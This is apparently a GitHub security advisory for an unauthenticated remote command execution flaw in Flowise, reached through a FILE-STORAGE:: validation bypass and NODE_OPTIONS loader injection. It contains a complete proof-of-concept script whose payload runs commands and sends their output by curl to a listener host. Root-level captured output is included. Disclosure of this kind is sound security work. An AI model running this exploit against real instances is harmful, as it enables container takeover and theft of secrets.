+ "details": "### Summary\n\nFlowise is vulnerable to a critical unauthenticated remote command execution (RCE) vulnerability. It can be exploited via a parameter override bypass using the `FILE-STORAGE::` keyword combined with a `NODE_OPTIONS` environment variable injection. This allows for the execution of arbitrary system commands with root privileges within the containerized Flowise instance, requiring only a single HTTP request and no authentication or knowledge of the instance.\n\n### Details\n\nThe vulnerability is in a validation check within the `replaceInputsWithConfig` function within `packages/server/src/utils/index.ts`. The check for `FILE-STORAGE::` was intended to handle file-type inputs but has three issues:\n\n1. Uses .includes() instead of .startsWith(): The check passes if FILE-STORAGE:: appears ANYWHERE in the string, not just at the beginning. A remote user can embed it in a comment: /* FILE-STORAGE:: */ { custom config }\n\n2. No parameter type validation: The check doesn't verify that the parameter is actually a file-type input. It applies to ANY parameter name, including mcpServerConfig.\n\n3. Complete bypass, not partial: When the check passes, it skips the isParameterEnabled() call entirely, allowing modification of parameters that administrators never authorized.\n\n**Vulnerable Code (`FILE-STORAGE::` bypass):**\n```typescript\n// packages/server/src/utils/index.ts, line 1192-1198\n// Skip if it is an override \"files\" input, such as pdfFile, txtFile, etc\nif (typeof overrideConfig[config] === 'string' && overrideConfig[config].includes('FILE-STORAGE::')) {\n // pass <-- BYPASSES ALL VALIDATION\n} else if (!isParameterEnabled(flowNodeData.label, config)) {\n // Only proceed if the parameter is enabled\n continue\n}\n```\n\nThis bypass allows an attacker to override the `mcpServerConfig` and inject a malicious `NODE_OPTIONS` value. The `Custom MCP` node's environment variable blocklist does not include `NODE_OPTIONS`, enabling an attacker to use the `--experimental-loader` to execute arbitrary JavaScript code before the main process starts.\n\n**Vulnerable Code (`NODE_OPTIONS` not blocked):**\n```typescript\n// packages/components/nodes/tools/MCP/core.ts, line 248-254\nconst dangerousEnvVars = ['PATH', 'LD_LIBRARY_PATH', 'DYLD_LIBRARY_PATH']\n\nfor (const [key, value] of Object.entries(env)) {\n if (dangerousEnvVars.includes(key)) {\n throw new Error(`Environment variable '${key}' modification is not allowed`)\n }\n}\n```\n\n### Requirements\n\n**API Override Enabled**\nThe chatflow must have \"API Override\" toggled ON in Chatflow Configuration.\n**Public Chatflow**\nThe chatflow must be shared publicly.\n**MCP Node**\nThe chatflow must contain a MCP tool node (Custom MCP tool was tested and confirmed).\n\nAlthough not enabled by default, the API Override feature is a powerful and officially documented capability that may be used in production deployments. Its primary purpose is to make chatflows dynamic and user-aware.\n\nCommon use cases that necessitate enabling this feature include:\n\n* **Session Management:** Passing a unique `sessionId` or `chatId` for each user to maintain separate conversation histories.\n* **User-Specific Variables:** Injecting user data such as name, preferences, or role into prompts to create personalized experiences.\n* **Dynamic Tool Selection:** Allowing users to specify which data sources or APIs to query based on their needs.\n* **Multi-Tenant Applications:** Supporting different configurations for each customer or organization without deploying separate chatflows.\n* **A/B Testing:** Evaluating different prompts or models in a live environment.\n\n### Setup\n\nTo reproduce the vulnerability, follow these steps:\n\n**Step 1: Start Flowise Instance**\n\n```bash\ndocker run -d --name flowise-test -p 3000:3000 flowiseai/flowise:latest\n```\n\n**Step 2: Configure a Public Chatflow with MCP Tool**\n\n1. Navigate to `http://localhost:3000` and create an account.\n2. Create a new chatflow.\n3. Add a `Custom MCP` node and a `Custom JS Function` node.\n4. Connect the `Custom MCP` output to the `Custom JS Function`'s tools input.\n5. Configure the `Custom JS Function` to be an `Ending Node` with the code: `return $tools ? \"Tools loaded\" : \"No tools\";`\n6. Configure the `Custom MCP` with the MCP Server Config: `{\"command\":\"npx\",\"args\":[\"-y\",\"@modelcontextprotocol/server-everything\"]}`\n7. Save the chatflow and note the `chatflowId` from the URL.\n8. In Chatflow Configuration, **enable API Override** and make the chatflow **Public**.\n\n### PoC\n\nSingle-Request RCE with remote command output retrieval. The following demonstrates arbitrary command execution with automatic data transmission to a remote listener:\n\n#### Step 1: Setup Listener\n```bash\n# Start netcat listener to receive transmitted data\n# Note: If testing locally, run this in a separate terminal\nnc -lvnp 5000\necho \"Listener started on port 5000...\"\n```\n\n#### Step 2: Trigger Exploit\n```bash\n#!/bin/bash\n\nCHATFLOW_ID=\"ABC-123-...\"\nTARGET=\"http://localhost:3000\"\nLISTENER_IP=\"172.17.0.1\" # Docker local IP for testing\n\n# Payload: Execute commands and transmit output to remote listener\nLOADER_CODE='import{execSync}from\"child_process\";const cmd=\"id && pwd && ls\";const out=execSync(cmd).toString();try{execSync(\"curl -s -m 3 --data-binary \\\"\"+out+\"\\\" http://'$LISTENER_IP':5000\");}catch(e){}export{};'\n\nENCODED=$(echo -n \"$LOADER_CODE\" | base64 | tr -d '\\n')\n\n# Construct the crafted MCP config\nCONFIG='{\"command\":\"npx\",\"args\":[\"-y\",\"@modelcontextprotocol/server-everything\"],\"env\":{\"NODE_OPTIONS\":\"--experimental-loader data:text/javascript;base64,'$ENCODED'\"}}'\nCONFIG_ESCAPED=$(echo \"$CONFIG\" | sed 's/\"/\\\\\"/g')\n\n# Single request triggers RCE\ncurl -X POST \"$TARGET/api/v1/prediction/$CHATFLOW_ID\" \\\n -H \"Content-Type: application/json\" \\\n -d \"{\n \\\"question\\\": \\\"trigger\\\",\n \\\"overrideConfig\\\": {\n \\\"mcpServerConfig\\\": \\\"/* FILE-STORAGE:: */ $CONFIG_ESCAPED\\\"\n }\n }\"\n```\n\n#### Step 3: Verify Command Execution\n```\n# Check the listener output\nConnection received...\nPOST / HTTP/1.1\nHost: 172.17.0.1:5000\nUser-Agent: curl/8.17.0\nAccept: */*\nContent-Length: 214\nContent-Type: application/x-www-form-urlencoded\n\nuid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)\n/\nbin\ndev\netc\nhome\nlib\nmedia\nmnt\nopt\nproc\nroot\nrun\nsbin\nsrv\nsys\ntmp\nusr\nvar\n```\n\n### Impact\n\nThis vulnerability allows for:\n\n* **Full Container Compromise:** Arbitrary command execution as the root user.\n* **Data Exfiltration:** Access to all secrets, credentials, and user data within the container.\n* **Lateral Movement:** A pivot point for attacking internal networks and other connected systems.\n\nThe exploit requires no prior authentication, no specific knowledge of the target instance, and is executed with a single HTTP POST request, making it a critical and easily exploitable vulnerability.\n\n### Credit\n\nJeremy Brown",
![advisory-database[bot]](https://avatars.githubusercontent.com/in/21409?v=4&size=40){kind=avatar}
0 commit comments